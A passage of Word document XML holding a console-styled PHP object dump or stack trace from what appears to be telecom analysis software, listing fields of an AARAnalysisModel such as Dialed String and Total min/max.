              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2D4BBC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABF4E34" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7827FD46" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_tpl_methods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312C6536" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3388FC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        0 =&gt; 'label',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471AE025" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        1 =&gt; 'input',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D15D8E9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        2 =&gt; 'select',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2F4AF1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        3 =&gt; 'value',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="035AF9C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        4 =&gt; 'radio',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542C6B35" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        5 =&gt; 'checkbox',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4719A107" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        6 =&gt; 'text',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D435C0A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        7 =&gt; 'index',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2EC4F2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        8 =&gt; 'iterator',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0946658A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB208A4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05026D8C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_listIndex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493151FA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_fld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0422AD8E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_labelSuffix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4168C9DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C154D12" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083A9C4F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8B4469" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CC5573" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F6E66F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47F2F901" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  5 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F477C8B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0481D0E4"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SystemManagementService.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03377FFE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 375,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0335D97E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; 'query',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E55C51" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OSSIModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511359F9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6F93C0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>AARAnalysisModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498414FA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_connectionOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2587C5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_objname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> analysis',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D67F50" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_lastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DEE585" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="061807C5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EECBFC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dialed_String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E145DF5"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E6570EB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '807fff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A9DD62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="439ED5BD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7A8508" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 18,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4E67C9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Dialed String',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF068BB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEE982F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45514380" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'Digits to be analyzed',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59976C3A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211FC809" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B49C860" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3898F32D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB5D931" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015A1076" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Total_min</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7736224E"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2CF0751" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8080ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5892E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60089816" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BF5A9C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C03EB9C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Total min',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D72B0D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F60030" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F722F78" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A93D627" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348B5B8D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Total_max</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614411B4"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0B680C4C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8081ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31AC7449" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF5E298" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5702C566" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205BAE47" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Total max',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7839938F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DED6E0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
